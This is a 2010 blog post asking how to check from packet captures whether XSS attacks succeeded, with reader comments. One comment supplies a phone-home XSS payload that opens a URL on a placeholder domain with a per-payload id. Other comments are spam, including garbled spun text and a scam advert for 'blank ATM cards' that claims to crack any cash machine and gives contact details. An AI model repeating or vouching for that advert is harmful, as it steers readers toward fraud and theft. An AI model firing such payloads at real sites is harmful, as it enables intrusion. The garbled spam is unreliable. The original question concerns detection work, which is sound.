Wednesday, November 3, 2010

XSS without Browser

To all Sec guys, I had been cracking my brain over these past 2 weeks thinking on how do i verify successful XSS attacks without using the browser. I know it sound absurd, but that's the way it is. All i have is pcap files available. From those pcap files, we can obviously search for those "script" word or other variants of XSS attacks by using regular expression. However, how do we know if an attempt is successfully executed or just false positive. Looking at the HTTP 200 response code, that will tell me that the attempt went through, but how do we know if we are truly exploited. Javascript maybe?

The Hacka Man

7 comments:

Michael Hendrickx said...

You can see if the javascript came back with the HTTP response, unfiltered.

If you see a <script&rt; .... or a < script > tag, that would indicate it could be executed. Assuming the browser has JavaScript enabled.

Anonymous said...

Admissible, they remonstrate on to be taught that filing lawsuits is not the course to quarry piracy. A substitute alternatively, it's to jolly-boat something mastery than piracy. Like equable of use. It's to the nth gradually a the answer tools easier to utter iTunes than to search the Internet with imperil of malware and then crappy property, but if people are expected to reciprocate endorse loads and chaperon to seeing that ages, it's not going to work. They just be subjected to a indelicate on every so day in and day exposed old-fashioned forwards people realize up software and Network sites that vocal cut it ridiculously amenable to privateer, and up the quality. If that happens, then there particularize be no stopping piracy. But they're too on one's guard and skittish of losing. Risks proceed to be charmed with!

thomas

Android Game Development said...

I am impressed by the quality of information on this website. There are a lot of good resources here. I am sure I will visit this place again soon.

jailbreaking iPhone 4s said...

Can't think of any solution around it but I think that everyone uses browser so no one needs to use this approach.

Anonymous said...

easy.

javascript:window.open('http://success.yourdomain.com/uid');

each payload gets a uid, search for your 'success' domain in the pcaps.

That "phone-home" technique works all all sorts of javascript runtime environments not just browsers but rhino and others as well...

Jonathan Richardson said...

Thanks for sharing. Great post very Informative, also checkout Rock Hard Designs

Unknown said...

i was once living on the street where by things were so hard for me, even to pay off my bills was very difficult for me i have to park off my apartment and start sleeping on the street of Vegas. i tried all i could do to secure a job but all went in vain because i was from the black side of America. so i decided to browse through on my phone for jobs online where i got an advert on Hackers advertising a Blank ATM card which can be used to hack any ATM Machine all over the world, i never thought this could be real because most advert on the internet are based on fraud, so i decided to give this a try and look where it will lead me to if it can change my life for good. i contacted this hackers and they told me they are from Australia and also they have branch all over the world in which they use in developing there ATM CARDS, this men who were geeks and also experts at ATM repairs, programming and execution who taught me various tips and tricks about breaking into an ATM Machine with a Blank ATM card.i applied for the Blank ATM card and it was delivered to me within 3 days and i did as i was told to and today my life has changed. there is no ATM MACHINES this BLANK ATM CARD CANNOT penetrate into, because it has been programmed with various tools and software before it will be send to you. i know this is illegal but also a smart way of living Big because the government cannot help us so we have to help our self. if you also want this BLANK ATM CARD you can contact these Hackers at
email: skylinktechnes@yahoo.com whatsapp: +1(213)328-0248